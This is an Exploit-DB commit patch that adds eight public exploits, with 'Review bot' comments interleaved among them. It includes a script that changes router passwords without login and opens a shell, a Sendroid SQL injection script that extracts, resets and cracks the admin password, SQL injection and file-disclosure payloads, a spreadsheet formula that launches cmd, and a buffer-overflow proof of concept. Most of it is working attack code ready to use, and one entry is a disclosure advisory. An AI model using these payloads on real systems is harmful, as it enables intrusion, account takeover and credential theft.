From b91055c9da17deeb62e426558e1c0bc4fa06699b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 Dec 2017 05:02:31 +0000 Subject: [PATCH] DB: 2017-12-27 8 changes to exploits/shellcodes GetGo Download Manager 5.3.0.2712 - Buffer Overflow Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation COMTREND ADSL Router CT-5367 - Remote Code Execution Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection Biometric Shift Employee Management System 3.0 - Local File Disclosure Sendroid < 6.5.0 - SQL Injection SilverStripe CMS 3.6.2 - CSV Excel Macro Injection Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection --- exploits/hardware/remote/43389.py | 124 ++++++++++++++++++ exploits/php/webapps/43349.txt | 79 ++++++++++++ exploits/php/webapps/43393.txt | 26 ++++ exploits/php/webapps/43394.txt | 23 ++++ exploits/php/webapps/43395.php | 204 ++++++++++++++++++++++++++++++ exploits/php/webapps/43396.txt | 36 ++++++ exploits/windows/dos/43391.py | 57 +++++++++ exploits/windows/local/43390.txt | 115 +++++++++++++++++ files_exploits.csv | 8 ++ 9 files changed, 672 insertions(+) create mode 100755 exploits/hardware/remote/43389.py create mode 100644 exploits/php/webapps/43349.txt create mode 100644 exploits/php/webapps/43393.txt create mode 100644 exploits/php/webapps/43394.txt create mode 100644 exploits/php/webapps/43395.php create mode 100644 exploits/php/webapps/43396.txt create mode 100755 exploits/windows/dos/43391.py create mode 100644 exploits/windows/local/43390.txt diff --git a/exploits/hardware/remote/43389.py b/exploits/hardware/remote/43389.py new file mode 100755 index 000000000..90c491d6c --- /dev/null +++ b/exploits/hardware/remote/43389.py 
@@ -0,0 +1,124 @@ +# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute +# Date: 11-12-2017 +# Exploit Author: TnMch +# Software Link : null +# Type : HardWare +# Risk of use : High +# Type to use : Remote + + +1. Description + +Any user can edit all users password and execute remote code directly without have access + +2. Proof of Concept + +request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi + +
+ + + + + + + + + + + + + + + + + +
Username:
Old Password:
New Password:
Confirm Password:
+
+
+
+ + +3 .exploit + + +#!/usr/bin/env python +import platform +import requests +import base64 + +url = "http://192.168.1.1/" + +''' first check default gateway ''' + +r = requests.get(url,allow_redirects=True) +resp = r.content + +'''Check resp''' + +if 'Authorization' not in resp: + exit("[-]Invalid host !! ") + +''' Change password ''' + +again = True + +while again: + print "Which User" + print "(root | support | user )" + user = raw_input('user : ').split()[0] + + if user not in ("root","support","user"): + exit("[-] No user with this name !! ") + + print "[+] Update password ",user + password = raw_input('new password : ').split()[0] + print "[+] Update new password ['",password,"']" + + if user == "root": + url +="password.cgi?sysPassword="+password + if user == "support": + url +="password.cgi?sptPassword="+password + if user == "user": + url +="password.cgi?usrPassword="+password + + pass_b64 = password.encode('base64').split()[0] + + r2 = requests.get(url,allow_redirects=True) + resp2 = r2.content + + ''' Check update ''' + + if pass_b64 in resp2: + print "[+] Password for user : ",user," updated!" + print "Happy hacking :D, enjoy" + else: + print "[-] Something Wrong , please check again! " + + y_n = raw_input('Do you want again? :D (y/n) : ').split()[0] + + if 'n'!= y_n and 'y' != y_n: + exit('bad input :(') + if y_n == 'n': + print "Go Go Go :D ,No Time for you Mr.Robot" + shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0] + if shell_yn !='n': + sys = platform.system() + if sys =="Windows": + exit("Sorry only on Linux or Mac Os") + from pwn import * + target = "192.168.1.1" + port = 23 + p = remote(target,port) + p.recvuntil("Login:") + p.sendline(user) + p.recvuntil("Password:") + p.sendline(password) + p.sendline("sysinfo ;sh") + p.interactive() + again = False \ No newline at end of file diff --git a/exploits/php/webapps/43349.txt b/exploits/php/webapps/43349.txt new file mode 100644 index 000000000..9a470c059 --- /dev/null 
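Review bot: The file has no Solution or mitigation section and records `Software Link : null` with no CVE and no firmware version, while the other advisories in this commit (43390, 43391, 43395, 43396) at least state a fix status; suggest adding `4. Solution` giving the tested firmware build and either the vendor fix or `No fix known at publication`. The text between `request this page before login to ADSL panel` and `3 .exploit` appears to have been an HTML form whose markup was lost in rendering (the `Username:` / `Old Password:` lines carry no `+` marker), so that part of the proof of concept cannot be reviewed from this hunk. In the script, the local `sys = platform.system()` shadows the `sys` module name; `os_name = platform.system()` would read more clearly.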
+++ b/exploits/php/webapps/43349.txt 
@@ -0,0 +1,79 @@ +# # # # # +# Exploit Title: Cells Blog 3.5 - SQL Injection +# Dork: N/A +# Date: 16.12.2017 +# Vendor Homepage: http://www.cells.tw/ +# Software Link: http://www.cells.tw/cells/ +# Version: 3.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] +# +# -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1 AND 9841=9841&fmid=7 +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1&fmid=7 AND 2056=2056 +# 2) +# http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] +# +# Parameter: fnid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 +# +# 3) +# http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10 AND 9273=9273 +# +# 
Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2 AND 9536=9536&fmid=10 +# +# 4) +# http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL] +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1&fmid=2 AND 5699=5699 +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1 AND 9899=9899&fmid=2 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43393.txt b/exploits/php/webapps/43393.txt new file mode 100644 index 000000000..550c62c11 --- /dev/null +++ b/exploits/php/webapps/43393.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN FAQ Pro 4.0.0 - SQL Injection +# Dork: N/A +# Date: 24.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/jextn-faq-pro/ +# Version: 4.0.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17875 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jefaqpro&view=category&id=[SQL]&Itemid=494 +# +# 11+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43394.txt b/exploits/php/webapps/43394.txt new file mode 100644 index 000000000..df73616f7 --- /dev/null +++ b/exploits/php/webapps/43394.txt 
@@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download +# Dork: N/A +# Date: 24.12.2017 +# Vendor Homepage: https://www.shiftsystems.net/ +# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908 +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17876 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker download local files.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE] +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43395.php b/exploits/php/webapps/43395.php new file mode 100644 index 000000000..67d3c94c5 --- /dev/null +++ b/exploits/php/webapps/43395.php 
@@ -0,0 +1,204 @@ +# Exploit Title: Sendroid - Bulk SMS Portal, Marketing Script( 5.0.0 - 6.5.0 ) - SQL Injection +# Google Dork: "welcome to * SMS portal" +# Date: 22/12/2017 +# Exploit Author: Onwuka Gideon +Contact: http://twitter.com/@gideon_onwuka +# Vendor Homepage: http://ynetinteractive.com/ +# Software Buy: https://codecanyon.net/item/sendroid-bulk-sms-portal-marketing-2way-messaging-script-with-mobile-app/14657225 +# Version: 5.0.0 - 6.5.0 +# Tested on: Mac OS + + +1. Description + +The softaware suffers from SQL Injection: +"/API/index.php?action=compose&username=sender&api_key=sdsd&sender" + +2. Script (Automatic takeover) + +Attached to mail + +4. How to run Script + You must have PHP installed on your system to run the script. + + - First, copy the code to a file and save(eg: sendroid_exploit.php) + - Open up your command line and CD into the directory where you saved the file. + - Now, type "$ php -f sendroid_exploit.php url=http://localhost/sms" + +Note: The URL should be a direct link to where the software is installed. + +3. 
Proof of Concept + +Run the script for example: + php -f sendroid_exploit.php url=http://localhost/sms + + +* +*/ + +parse_str(implode('&', array_slice($argv, 1)), $_GET); + +$queries =[ + "sql_get_email" => "/*!12345SELECT*/+email+FROM+users+WHERE+username='admin'", + "sql_get_password0" => "/*!12345SELECT*/+SUBSTRING(password,1,32)+FROM+users+WHERE+username='admin'", + "sql_get_password1" => "/*!12345SELECT*/+SUBSTRING(password,33)+FROM+users+WHERE+username='admin'", +]; + +$payload = "/API/index.php?action=compose&username=asdasd%27)%20OR%20(SELECT%203321%20FROM(SELECT%20COUNT(*),CONCAT+((),FLOOR(RAND(0)*2))x%20FROM%20/*!INFORMATION_SCHEMA*/.PLUGINS%20GROUP%20BY%20x)a)--%20RPjw&api_key=sdsd&sender"; +// + +checkCommands(); + +print_r(getEmailAndPassword($_GET['url'], $payload, $queries)); + + +/** +* +* Checks if minimum expected command is issued +* +* @param: $_GET +* @return; Boolean +**/ + + +function checkCommands(){ + + //url && shell + $url = $_GET['url'] ?? ""; + + if( $url == "" ) { + + "Please enter a target"; + + help(); + exit(1); + } +} + +// Print help message +function help(){ + + echo "Invalid command " . PHP_EOL; + echo "eg php -f sendroid_exploit.php url=https://localhost/sms" . PHP_EOL; + echo "" . PHP_EOL; +} + + +// == +// == Reset password and Get the Password hash +// == +function getEmailAndPassword($url, $payload, $queries){ + + //>> Fetch admin email + echo "Fetching admin email....:"; + $sql_get_email = $url . str_replace("", $queries['sql_get_email'], $payload); + $email = extractValue(makeRequest($sql_get_email)); + echo $email . PHP_EOL.PHP_EOL; + //<< EndFetch admin email + + //>> Fetch admin old pass + echo "Fetching admin old password...:"; + $sql_old_password0 = $url . str_replace("", $queries['sql_get_password0'], $payload); + $sql_old_password1 = $url . str_replace("", $queries['sql_get_password1'], $payload); + $old_password = extractValue(makeRequest($sql_old_password0), 'password') . 
extractValue(makeRequest($sql_old_password1), 'password'); + echo $old_password . PHP_EOL.PHP_EOL; + //<< End Fetch admin old + + // Now we have the old password and admin email + // reset password + echo "Resetting password...:"; + $forgot_password = $url . "/administrator/index.php?reset&p"; + makeRequest($forgot_password, "POST", ["userEmail" => $email]); + echo " Done!" . PHP_EOL.PHP_EOL; + + //>> Fetch admin new password + echo "Getting new password...:"; + $sql_new_password0 = $url . str_replace("", $queries['sql_get_password0'], $payload); + $sql_new_password1 = $url . str_replace("", $queries['sql_get_password1'], $payload); + $new_password = extractValue(makeRequest($sql_new_password0), 'password') . extractValue(makeRequest($sql_new_password1), 'password'); + echo $new_password . PHP_EOL.PHP_EOL; + //<< End Fetch admin new password + + //>> Cracking password + echo "Craking password...:"; + $password = crackPassword($new_password); + echo $password . PHP_EOL.PHP_EOL; + //<< Cracking password + + // return $sql_get_email; + return ["email" => $email, "password" => $password]; +} + +// +// POST and GET request +// == +function makeRequest($url, $method = "GET", $parameter = []){ + + // Get cURL resource + $curl = curl_init(); + // Set some options - we are passing in a useragent too here + if( strtolower($method) == "post" ){ + curl_setopt_array($curl, [ + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => $url, + CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36', + CURLOPT_POST => 1, + CURLOPT_POSTFIELDS => $parameter + ]); + } + else{ + + curl_setopt_array($curl, [ + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => $url, + CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36' + ]); + } + // Send the request & save response to $resp + $resp = curl_exec($curl); + // Close request to clear 
up some resources + curl_close($curl); + + return $resp; +} + +// Extract the real value +function extractValue($payload, $what = "email"){ + + $patterns = []; $patterns[0] = "/ for key 'group_key'/"; $patterns[1] = "/Duplicate entry /"; $patterns[2] = "/\s\s+/"; $patterns[3] = "/'/"; + $replacements = []; $replacement[0] = ""; $replacements[1] = ""; $replacements[2] = ""; $replacements[3] = ""; + + $result = preg_replace($patterns, $replacements, $payload); + + return substr($result, 0, -1); +} + + +function crackPassword($password){ + + echo " cracking... please wait... "; + + $pwsalt = explode( ":",$password ); + + for ($i=1; $i < 20000000000000 ; $i++) { + + if(md5($i . $pwsalt[1]) == $pwsalt[0] ) { + + return $i; + } + + } + + return "Could not crack password"; +} + +If you successfully run the script, you'll get the admin password. You can login to the admin portal: +localhost/sms/administrator/ + +4. Solution: + +Update to the latest version \ No newline at end of file diff --git a/exploits/php/webapps/43396.txt b/exploits/php/webapps/43396.txt new file mode 100644 index 000000000..ee0b65bcd --- /dev/null +++ b/exploits/php/webapps/43396.txt 
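Review bot: The affected-version statement is inconsistent: the title and `# Version:` header give `5.0.0 - 6.5.0`, the CSV row added in this commit says `Sendroid < 6.5.0`, and `4. Solution` only says `Update to the latest version` without naming the fixed release, so a reader cannot tell whether 6.5.0 itself is vulnerable; suggest stating the first fixed version explicitly. The section numbering runs 1, 2, 4, 3 and then 4 again and should be straightened out. For detection, the strings that extractValue() strips (`Duplicate entry` and `for key 'group_key'`) are the database error text the script expects to find in the `/API/index.php` response, so a log or WAF rule matching that error in API responses is a reasonable indicator of this kind of probing; noting that under Description would help defenders.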
@@ -0,0 +1,36 @@ +Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection +Vendor Homepage: https://www.silverstripe.org/ +Software Link: https://www.silverstripe.org/download +Discovered by: Ishaq Mohammed +Contact: https://twitter.com/security_prince +Website: https://about.me/security-prince +Category: web apps +Platform: PHP + +Description: + +In the CSV export feature of the SilverStripe CMS, it's possible for the +output to contain macros and scripts, which if imported without +sanitization into software (including Microsoft Excel) may be executed. + +Proof of Concept +Steps to Reproduce: + +1. Login with normal user's credentials +2. Access the below URL via your browser: +http://localhost/SilverStripe/admin/myprofile +3. Enter the below payload in the "First Name" field and save the profile" +@SUM(1+1)*cmd|' /C calc'!A0 +4. Log in with admin's credentials on a different browser +5. Access te security page at the below link: +http://localhost/SilverStripe/admin/security/ +6. Click on "Export to CSV" option and open the exported CSV file in any +Spreadsheet application + + +Solution: +The issue has been fixed in the latest release of SilverStripe which can be +downloaded from here: https://www.silverstripe.org/download + +Reference: +https://www.silverstripe.org/download/security-releases/ss-2017-007 \ No newline at end of file diff --git a/exploits/windows/dos/43391.py b/exploits/windows/dos/43391.py new file mode 100755 index 000000000..e174ac552 --- /dev/null +++ b/exploits/windows/dos/43391.py 
@@ -0,0 +1,57 @@
+# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
+# CVE: CVE-2017-17849
+# Date: 22-12-2017
+# Tested on Windows 10 32 bits
+# Exploit Author: Aloyce J. Makalanga
+# Contact: https://twitter.com/aloycemjr
+# Software Link: http://www.getgosoft.com/getgodm/
+# Category: webapps
+# Attack Type: Remote
+# Impact: Code Execution
+
+
+
+1. Description
+
+A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.
+
+
+2. Proof of Concept
+
+
+
+def main():
+ host = "192.168.205.128"
+ port = 80
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind((host, port))
+ s.listen(1)
+ print "\n[+] Listening on %d ..." % port
+
+ cl, addr = s.accept()
+ print "[+] Connection accepted from %s" % addr[0]
+
+ evilbuffer = "A" * 4105
+ hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this.
+ pads = "C"*(6000 - len(evilbuffer + hardCodedEIP))
+ payload = evilbuffer + hardCodedEIP + pads
+
+ buffer = "HTTP/1.1 200 " + payload + "\r\n"
+
+ print cl.recv(1000)
+ cl.send(buffer)
+ print "[+] Sending buffer: OK\n"
+
+ sleep(3)
+ cl.close()
+ s.close()
+
+if __name__ == '__main__':
+ import socket
+ from time import sleep
+ main()
+
+3. Solution:
+
+ No solution as of yet.
\ No newline at end of file
diff --git a/exploits/windows/local/43390.txt b/exploits/windows/local/43390.txt
new file mode 100644
index 000000000..ebfb3eb44
--- /dev/null
+++ b/exploits/windows/local/43390.txt
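Review bot: The Description says the flaw lets remote HTTP servers "execute arbitrary code on NAS devices", but the product is a Windows download manager and the header says `Tested on Windows 10 32 bits`; "NAS devices" looks carried over from another advisory and should read something like `on the client host`. The header also says `Category: webapps` while the file sits under `exploits/windows/dos` and the CSV row added in this commit classifies it as `dos,windows`; one of the two should be corrected, and `Impact: Code Execution` overstates what a `dos` entry demonstrates, which is a crash. The comment on `hardCodedEIP` points to a screenshot that is not part of the file, so it should instead state what the value is (an address valid only on the author's test system) rather than refer to an image.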
@@ -0,0 +1,115 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: Ubiquiti UniFi Video (Windows) +Vendor URL: https://www.ubnt.com +Type: Improper Handling of Insufficient Permissions or Privileges + [CWE-280] +Date found: 2016-05-24 +Date published: 2017-12-20 +CVSSv3 Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) +CVE: CVE-2016-6914 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +UniFi Video 3.7.3 (Windows), +UniFi Video 3.7.0 (Windows), +UniFi Video 3.2.2 (Windows), +older versions may be affected too. + + +4. INTRODUCTION +=============== +UniFi Video is a powerful and flexible, integrated IP video management +surveillance system designed to work with Ubiquiti’s UniFi Video Camera product +line. UniFi Video has an intuitive, configurable, and feature‑packed user +interface with advanced features such as motion detection, auto‑discovery, +user-level security, storage management, reporting, and mobile device support. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\" +by default and is also shipped with a service called "Ubiquiti UniFi Video". Its +executable "avService.exe" is placed in the same directory and also runs under +the NT AUTHORITY/SYSTEM account. 
+ +However the default permissions on the "C:\ProgramData\unifi-video" folder are +inherited from "C:\ProgramData" and are not explicitly overridden, which allows +all users, even unprivileged ones, to append and write files to the application +directory: + +c:\ProgramData>icacls unifi-video +unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) +BUILTIN\Administrators:(I)(OI)(CI)(F) +CREATOR OWNER:(I)(OI)(CI)(IO)(F) +BUILTIN\Users:(I)(OI)(CI)(RX) +BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) + +Upon start and stop of the service, it tries to load and execute the file at +"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in +the application directory by default at all. + +By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an +unprivileged user, it is therefore possible to escalate privileges and execute +arbitrary code as NT AUTHORITY/SYSTEM. + + +6. RISK +======= +To successfully exploit this vulnerability, an attacker must already have access +to a system running a vulnerable installation of UniFi video using a +low-privileged user account (i.e. through a password compromise). + +The vulnerability allows local attackers to escalate privileges and execute +arbitrary code as NT AUTHORITY/SYSTEM, which basically means a complete loss of +the system's confidentiality, integrity as well as availability. + + +7. SOLUTION +=========== +Update to v3.8.0 + + +8. 
REPORT TIMELINE +================== +2016-05-24: Discovery of the vulnerability +2016-05-24: Reported to vendor via HackerOne (#140793) +2016-05-24: Vendor acknowledges the vulnerability +2016-08-22: Request for status update +2016-08-22: Vendor states that there is no update so far +2016-08-23: MITRE assigns CVE-2016-6914 +2016-11-08: Request for status update +2016-11-08: Vendor states that there is no update so far +2016-12-08: Request for status update +2016-12-08: Vendor states that project team is working on it +2017-02-23: Request for status update +2017-03-23: No response from vendor +2017-03-23: Request for status update +2017-03-23: Vendor states that fix is scheduled for v3.7.0 +2017-05-23: v3.7.0 was released, but vulnerability is still exploitable, + vendor notified again +2017-06-07: Vendor states that fix is actually delayed +2017-08-26: Vendor provides beta versions of 3.7.3 and 3.8.0-beta3, which should + fix the issue +2017-08-31: While v3.7.3 is still vulnerable, the issue was fixed in 3.8.0-beta3 +2017-09-18: v3.8.0 released publicly +2017-12-20: Public disclosure + + +9. REFERENCES +============= +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-6914 +https://hackerone.com/reports/140793 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7ca674cd3..1d8b77523 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5432,6 +5432,7 @@ id,file,description,date,author,type,platform,port
 43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
 43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
 43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
+43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -9233,6 +9234,7 @@ id,file,description,date,author,type,platform,port
 41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
+43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15867,6 +15869,7 @@ id,file,description,date,author,type,platform,port
 43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
+43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -37662,6 +37665,10 @@ id,file,description,date,author,type,platform,port
 43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple,
 43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,
 43379,exploits/windows/webapps/43379.txt,"BEIMS ContractorWeb 5.18.0.0 - SQL Injection",2017-12-20,"Rajwinder Singh",webapps,windows,
+43393,exploits/php/webapps/43393.txt,"Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection",2017-12-26,"Ihsan Sencan",webapps,php,
+43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
+43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
+43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
@@ -38415,3 +38422,4 @@ id,file,description,date,author,type,platform,port
 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
 43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
+43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,